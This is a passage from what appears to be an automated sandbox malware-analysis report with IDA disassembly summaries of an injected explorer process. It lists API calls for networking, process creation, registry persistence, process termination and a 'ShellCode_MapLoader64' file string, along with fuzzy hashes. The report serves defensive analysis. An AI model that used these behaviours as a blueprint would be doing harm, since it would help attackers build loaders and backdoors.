                                                                            • setsockopt.WS2_32 ref: 00BF42CE
                                                                            • SetEvent.KERNEL32 ref: 00BF4479
                                                                            • WaitForSingleObject.KERNEL32 ref: 00BF44E1
                                                                            • CloseHandle.KERNEL32 ref: 00BF4544
                                                                            • CloseHandle.KERNEL32 ref: 00BF45D8
                                                                            • VirtualFree.KERNEL32 ref: 00BF4683
                                                                            • shutdown.WS2_32 ref: 00BF475D
                                                                            • closesocket.WS2_32 ref: 00BF4768
                                                                              • Part of subcall function 00C04C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04CCF
                                                                              • Part of subcall function 00C04740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Timer$ChangeCloseConcurrency::details::platform::__HandleQueue$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                                                                            • String ID: d
                                                                            • API String ID: 1089388041-2564639436
                                                                            • Opcode ID: 22ee97f09f4b1a6eeec20ce19dd3291ad4cb0a41c74073d43de2e5ea2f1671a4
                                                                            • Instruction ID: 3e32aae38ad927e238a75bb8b4a971bbb4ec272f9b5e17b44433ac45df09372d
                                                                            • Opcode Fuzzy Hash: 22ee97f09f4b1a6eeec20ce19dd3291ad4cb0a41c74073d43de2e5ea2f1671a4
                                                                            • Instruction Fuzzy Hash: 64C10932208E8485EB74DB44F4947BAA3A0F7D9754F510626D78E87BA8EF7CC598CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 144976343-2564639436
                                                                            • Opcode ID: b0d4b0597200e7fced3cc0175a142e2adc3c36a1462220e0a18b3d554b4c3aa4
                                                                            • Instruction ID: 57d5fb2db1e20450fb85e07e8a7cd0146fcf3ae9de1ab0ddd102072663a2d3e5
                                                                            • Opcode Fuzzy Hash: b0d4b0597200e7fced3cc0175a142e2adc3c36a1462220e0a18b3d554b4c3aa4
                                                                            • Instruction Fuzzy Hash: FA419036218B8482DB148B56F49431EB7B4F3C9B94F20511AEA9E43BA8CF7DC585CB00
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00BF38F6
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BF3917
                                                                            • LocalAlloc.KERNEL32 ref: 00BF392F
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • CreateProcessW.KERNEL32 ref: 00BF3A0E
                                                                            • LocalFree.KERNEL32 ref: 00BF3A1E
                                                                            • LocalFree.KERNEL32 ref: 00BF3A29
                                                                            • LocalFree.KERNEL32 ref: 00BF3A3B
                                                                            • LocalFree.KERNEL32 ref: 00BF3A46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem_errno_invalid_parameter_noinfolstrlen
                                                                            • String ID: h
                                                                            • API String ID: 1407737935-2439710439
                                                                            • Opcode ID: 5db3b849252307c87e8a57140bbaa53c71b171dc624f000820bd87f75d707c1e
                                                                            • Instruction ID: 88e8d609895f8f771780e15f288a94caf0461011c7222eee58d1e05bacf24a55
                                                                            • Opcode Fuzzy Hash: 5db3b849252307c87e8a57140bbaa53c71b171dc624f000820bd87f75d707c1e
                                                                            • Instruction Fuzzy Hash: EB31FA36218A8482E7609F61F4A875FB7A1F7C5B54F504225EA8947BA8DFBCC549CB00
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE786E
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegOpenKeyW.ADVAPI32 ref: 00BE78B3
                                                                            • lstrlenW.KERNEL32 ref: 00BE78C2
                                                                            • RegSetValueExW.ADVAPI32 ref: 00BE78F5
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE7907
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE791C
                                                                            Strings
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 00BE78E6
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 00BE787C
                                                                            • SOFTWARE\%s, xrefs: 00BE7883
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3731830441-923683513
                                                                            • Opcode ID: bc8a62a413aab8115f21246b749b5c834cb4a6f0d706a5d7d4e36d6591e53ffc
                                                                            • Instruction ID: 9871231ef25e701310ae9f29d1f4cefee0ae1c9e9a90a8fdf0885d4111f44036
                                                                            • Opcode Fuzzy Hash: bc8a62a413aab8115f21246b749b5c834cb4a6f0d706a5d7d4e36d6591e53ffc
                                                                            • Instruction Fuzzy Hash: 1B113635329AC191EB20DB25FC94B9A73A0FBC4785F805522DA5E836A4DF7CC549C704
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32 ref: 00C1139E
                                                                            • malloc.LIBCMT ref: 00C11407
                                                                            • MultiByteToWideChar.KERNEL32 ref: 00C1143B
                                                                            • LCMapStringW.KERNEL32 ref: 00C11462
                                                                            • LCMapStringW.KERNEL32 ref: 00C114AA
                                                                            • malloc.LIBCMT ref: 00C11507
                                                                              • Part of subcall function 00C0C678: _FF_MSGBANNER.LIBCMT ref: 00C0C6A8
                                                                              • Part of subcall function 00C0C678: HeapAlloc.KERNEL32(?,?,00000000,00C105CC,?,?,00000000,00C10ADD,?,?,?,00C10B87,?,?,00000000,00C0AB85), ref: 00C0C6CD
                                                                              • Part of subcall function 00C0C678: _callnewh.LIBCMT ref: 00C0C6E6
                                                                              • Part of subcall function 00C0C678: _errno.LIBCMT ref: 00C0C6F1
                                                                              • Part of subcall function 00C0C678: _errno.LIBCMT ref: 00C0C6FC
                                                                            • LCMapStringW.KERNEL32 ref: 00C1153C
                                                                            • WideCharToMultiByte.KERNEL32 ref: 00C1157C
                                                                            • free.LIBCMT ref: 00C11590
                                                                            • free.LIBCMT ref: 00C115A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                            • String ID:
                                                                            • API String ID: 1080698880-0
                                                                            • Opcode ID: af953abe7841ed101deebbbddd0bd4cc4f493c92dfd21aa2a52dcb46ea6e20e0
                                                                            • Instruction ID: 2a17b32b6414ab6fc9ae6cc02eabf8723f1dfc09ca151c8a7a8e41301477b0f4
                                                                            • Opcode Fuzzy Hash: af953abe7841ed101deebbbddd0bd4cc4f493c92dfd21aa2a52dcb46ea6e20e0
                                                                            • Instruction Fuzzy Hash: F971C53230478086DB258F26D4407A977A6F78ABE8F580325EF6A47B98DF3CC681D700
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE5AFE
                                                                            • _LDint.LIBCPMTD ref: 00BE5B15
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • CreateFileW.KERNEL32 ref: 00BE5B93
                                                                            • WriteFile.KERNEL32 ref: 00BE5BF0
                                                                            • CloseHandle.KERNEL32 ref: 00BE5C13
                                                                            • CloseHandle.KERNEL32 ref: 00BE5C28
                                                                            • DeleteFileW.KERNEL32 ref: 00BE5C36
                                                                            Strings
                                                                            • %s\ShellCode_MapLoader64, xrefs: 00BE5B42
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandle$CreateDeleteDintModuleNameWrite_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\ShellCode_MapLoader64
                                                                            • API String ID: 797432855-674329531
                                                                            • Opcode ID: 6c4c68b4993732659224326c0d985c0c1f9bd7ca997abf86513995386b1bba55
                                                                            • Instruction ID: 12d5b6a1ae70f30dd573240eb7435c5f126e8198aae6410077287a63a8f6c1d6
                                                                            • Opcode Fuzzy Hash: 6c4c68b4993732659224326c0d985c0c1f9bd7ca997abf86513995386b1bba55
                                                                            • Instruction Fuzzy Hash: 5F310B72218AC886E730DB24F89879A73A1F7C9755F904326D69983BA8DF3DC509CB04
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocalund_memcpy$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616075706-0
                                                                            • Opcode ID: 4273aa3ed035d45046343f4e35ff5a98ddfcc1115a4f04b1cd00d0e68ff1453c
                                                                            • Instruction ID: 9ec8a8b02b0d0e71ab68976cf9669ceca61c81d5d9f8db816121ce6e461e54c3
                                                                            • Opcode Fuzzy Hash: 4273aa3ed035d45046343f4e35ff5a98ddfcc1115a4f04b1cd00d0e68ff1453c
                                                                            • Instruction Fuzzy Hash: DD81B1767096C09ADBB0CB1AE4907EAB7A1E7C9744F508026EA8987B58DF3CD585CF40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 3200977696-2564639436
                                                                            • Opcode ID: a91fcc2f4d1881e81c3f2414ec21d3bfaeb39f579f5509cc7686b59caf4bfee5
                                                                            • Instruction ID: 4f7b6a6c275e3864bea4d6db44ad9655c9ed58accf910814127bada33768db1d
                                                                            • Opcode Fuzzy Hash: a91fcc2f4d1881e81c3f2414ec21d3bfaeb39f579f5509cc7686b59caf4bfee5
                                                                            • Instruction Fuzzy Hash: B431A736218B8486DB54CB56F49531AB7B4F3C9B94F205116EB9E43BA8CF7DC985CB00
                                                                            APIs
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 00BE422E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseHandleObjectOpenResetSingleWait
                                                                            • String ID: {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1560999653-1105423733
                                                                            • Opcode ID: 9f19a6a2f878386801282272d62eb7bc9277ca4ec48c3bee408db1daecd0a670
                                                                            • Instruction ID: c896b207cab09b057b416ac160d5567cf2b61493a70ef6d0ad01c9d9a583fa1e
                                                                            • Opcode Fuzzy Hash: 9f19a6a2f878386801282272d62eb7bc9277ca4ec48c3bee408db1daecd0a670
                                                                            • Instruction Fuzzy Hash: 14210B30924A80C6FE349B22F86872D73E0F7D6759F6007A6E64A42564CF3CC988DB06
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C043A2
                                                                            • htons.WS2_32 ref: 00C043CF
                                                                            • wsprintfA.USER32 ref: 00C04404
                                                                              • Part of subcall function 00C04620: WSACreateEvent.WS2_32 ref: 00C04638
                                                                              • Part of subcall function 00C04620: WSAEventSelect.WS2_32 ref: 00C0465F
                                                                              • Part of subcall function 00C04620: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046B4
                                                                              • Part of subcall function 00C04620: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046C3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04448
                                                                              • Part of subcall function 00C033B0: send.WS2_32 ref: 00C033DC
                                                                              • Part of subcall function 00C04500: WSACreateEvent.WS2_32 ref: 00C04518
                                                                              • Part of subcall function 00C04500: WSAEventSelect.WS2_32 ref: 00C0453F
                                                                              • Part of subcall function 00C04500: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C04594
                                                                              • Part of subcall function 00C04500: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C045A3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0448B
                                                                              • Part of subcall function 00C03370: recv.WS2_32 ref: 00C0339C
                                                                            • und_memcpy.LIBCMTD ref: 00C044C9
                                                                            • LocalFree.KERNEL32 ref: 00C044D3
                                                                            • LocalFree.KERNEL32 ref: 00C044E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3834521385-0
                                                                            • Opcode ID: c628b2971ef1d7fa39ecd60ecf32e56224b5876f56dc8635161cab482b22f9b8
                                                                            • Instruction ID: c9aebe251a9b30170871bb6b972ea9323d67cc22e989f6295425c829422db5f7
                                                                            • Opcode Fuzzy Hash: c628b2971ef1d7fa39ecd60ecf32e56224b5876f56dc8635161cab482b22f9b8
                                                                            • Instruction Fuzzy Hash: 7541C276618B8486DB509B5AE49071EBBB0F7CAB94F208116EF8D43B68CF3DC585CB00
                                                                            APIs
                                                                            • _FF_MSGBANNER.LIBCMT ref: 00C10AA3
                                                                              • Part of subcall function 00C0EAEC: _set_error_mode.LIBCMT ref: 00C0EAF5
                                                                              • Part of subcall function 00C0EAEC: _set_error_mode.LIBCMT ref: 00C0EB04
                                                                              • Part of subcall function 00C0E88C: _set_error_mode.LIBCMT ref: 00C0E8D1
                                                                              • Part of subcall function 00C0E88C: _set_error_mode.LIBCMT ref: 00C0E8E2
                                                                              • Part of subcall function 00C0E88C: GetModuleFileNameW.KERNEL32 ref: 00C0E944
                                                                              • Part of subcall function 00C0E4DC: ExitProcess.KERNEL32 ref: 00C0E4EB
                                                                              • Part of subcall function 00C1059C: malloc.LIBCMT ref: 00C105C7
                                                                              • Part of subcall function 00C1059C: Sleep.KERNEL32(?,?,00000000,00C10ADD,?,?,?,00C10B87,?,?,00000000,00C0AB85,?,?,00000000,00C0AC3C), ref: 00C105DA
                                                                            • _errno.LIBCMT ref: 00C10AE5
                                                                            • _lock.LIBCMT ref: 00C10AF9
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00C10B87,?,?,00000000,00C0AB85,?,?,00000000,00C0AC3C,?,?,00000000,00C0AC73), ref: 00C10B0F
                                                                            • free.LIBCMT ref: 00C10B1C
                                                                            • _errno.LIBCMT ref: 00C10B21
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00C10B87,?,?,00000000,00C0AB85,?,?,00000000,00C0AC3C,?,?,00000000,00C0AC73), ref: 00C10B44
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                            • String ID:
                                                                            • API String ID: 113790786-0
                                                                            • Opcode ID: 139fafca0270282442084b567f0d1ea6b64a20e92c57c459f4d7fb58f8924735
                                                                            • Instruction ID: c180d9b49b1f3fb4faa489c99a6268d35022570ae60082eb826e83fa1b445163
                                                                            • Opcode Fuzzy Hash: 139fafca0270282442084b567f0d1ea6b64a20e92c57c459f4d7fb58f8924735
                                                                            • Instruction Fuzzy Hash: 8621E23164974482E714BF51E4547BA7365FB82B88F248634EA4A47795CFBCC8C0F341
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1193533834-0
                                                                            • Opcode ID: ebb3c86145ac574251e1cd260c97c5d9e44848db4e64dd633c1b28d872071a6e
                                                                            • Instruction ID: 0485ff5bc7bbc8aac443a04738d567042cf072616406b57d331e4a4428dfccc7
